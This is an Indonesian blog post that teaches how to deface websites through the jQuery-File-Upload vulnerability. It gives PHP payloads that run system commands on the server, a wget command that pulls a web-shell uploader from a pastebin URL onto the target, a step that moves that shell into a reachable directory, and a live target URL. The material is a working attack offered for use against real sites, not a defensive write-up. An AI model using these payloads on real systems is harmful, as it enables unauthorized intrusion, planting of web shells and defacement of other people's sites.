halo kawan kawan ku sekalian, kali ini w mw bagiin tutor jQuery File Upload dengan RCE. ini untuk mengatasi Shell yang ter download di poc jfu
oke lgsung aj
Bahan - Bahan :
> pastikan kalian sudah tau methode nya : Methode jQuery-File-Upload
> CSRF Online : Disini
> Live Target : Disini
Tutorial :
1. Pertama kita buat dulu File PHP untuk RCE na
<?php
system('uname -a');
?>
save dengan nama : rce.php / terserah lo
2. Masukin Target ke CSRF Online dan klik serang / apalah itu
3. Upload file nya
4. Akses file nya dan file akan terdownload
Lokasi Akses
ke DONLOT
5. Sekarang buka File yang Ter Donlot nya dan lihat isina, klo seperti ini berati vuln
5. sekarang edit rce.php , isinya seperti ini :
<?php
system(' wget https://pastebin.com/raw/ECstNap8 -O uploader.php ');
?>
upload lagi ke web, kemudian akses
kalau ter Donlot kita mundur dir ke dir sebelumnya, edit rce.php kemudian upload dan akses
<?php
system(' mv uploader.php ../../uploader.php ');
?>
akses : site.com/path/server/uploader.php
akses Live : https://competenceonline-utc.com/uploadtest/jQuery-File-Upload-9.11.2/server/up.php
sumber : https://bentutor.blogspot.com/2019/01/deface-metode-jquery-file-upload-with.html
0 komentar